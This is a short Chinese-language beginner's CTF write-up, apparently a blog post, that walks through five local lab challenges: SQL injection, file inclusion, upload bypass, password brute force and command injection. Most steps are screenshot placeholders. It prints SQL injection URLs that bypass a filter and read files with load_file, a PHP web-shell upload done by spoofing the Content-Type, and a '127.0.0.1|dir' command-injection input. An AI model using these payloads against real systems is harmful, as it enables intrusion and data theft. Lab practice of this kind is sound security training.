CTF的sql注入、文件包含、文件上传突破等五道题

使用win7建立一个ctf的环境,在本地测试实验

新手练习,在网上找了很多的资料

 

1、sql注入

    http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+CTF的sql注入、文件包含、文件上传突破等五道题_第1张图片

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)order%20by%204--+

CTF的sql注入、文件包含、文件上传突破等五道题_第2张图片

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,@@datadir--+

CTF的sql注入、文件包含、文件上传突破等五道题_第3张图片

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,load_file(%27c:\\flag.txt%27)--+

CTF的sql注入、文件包含、文件上传突破等五道题_第4张图片

 

 

2、文件包含

 

 

查看页面源代码

CTF的sql注入、文件包含、文件上传突破等五道题_第5张图片

对密文进行解密分析

CTF的sql注入、文件包含、文件上传突破等五道题_第6张图片

抓包转发测试

CTF的sql注入、文件包含、文件上传突破等五道题_第7张图片

CTF的sql注入、文件包含、文件上传突破等五道题_第8张图片

更改菜刀config.ini文件

CTF的sql注入、文件包含、文件上传突破等五道题_第9张图片

CTF的sql注入、文件包含、文件上传突破等五道题_第10张图片

用菜刀去连接 区分大小写

CTF的sql注入、文件包含、文件上传突破等五道题_第11张图片

CTF的sql注入、文件包含、文件上传突破等五道题_第12张图片

 

 

 

3、文件上传突破

 

上传assert.php

CTF的sql注入、文件包含、文件上传突破等五道题_第13张图片

抓包更改Content-Type的值为:image/png

CTF的sql注入、文件包含、文件上传突破等五道题_第14张图片

上传成功

CTF的sql注入、文件包含、文件上传突破等五道题_第15张图片

点击查看,触发assert.php

CTF的sql注入、文件包含、文件上传突破等五道题_第16张图片

用菜刀连接

CTF的sql注入、文件包含、文件上传突破等五道题_第17张图片

 

 

4、验证码爆破

对目标网站进行burp抓包

CTF的sql注入、文件包含、文件上传突破等五道题_第18张图片

转发到indruder进行密码爆破

对爆破进行分析,错误的请求的length都为1984,爆破到一个请求的length值为1989,

CTF的sql注入、文件包含、文件上传突破等五道题_第19张图片

使用这个123qwe去更改源数据包的password值

CTF的sql注入、文件包含、文件上传突破等五道题_第20张图片

 

成功登陆拿到key

CTF的sql注入、文件包含、文件上传突破等五道题_第21张图片

 

 

5、命令执行

使用127.0.0.1|dir 查看当前目录下的文件

CTF的sql注入、文件包含、文件上传突破等五道题_第22张图片

查看ipconfig

CTF的sql注入、文件包含、文件上传突破等五道题_第23张图片

查看key.php文件内容

CTF的sql注入、文件包含、文件上传突破等五道题_第24张图片

对登陆进行抓包

更改127.0.0.1的值

CTF的sql注入、文件包含、文件上传突破等五道题_第25张图片

查看原文件key.php

CTF的sql注入、文件包含、文件上传突破等五道题_第26张图片

 

 

新手练习,如有错误,请各位大佬多多指教!!!!

你可能感兴趣的:(CTF的sql注入、文件包含、文件上传突破等五道题)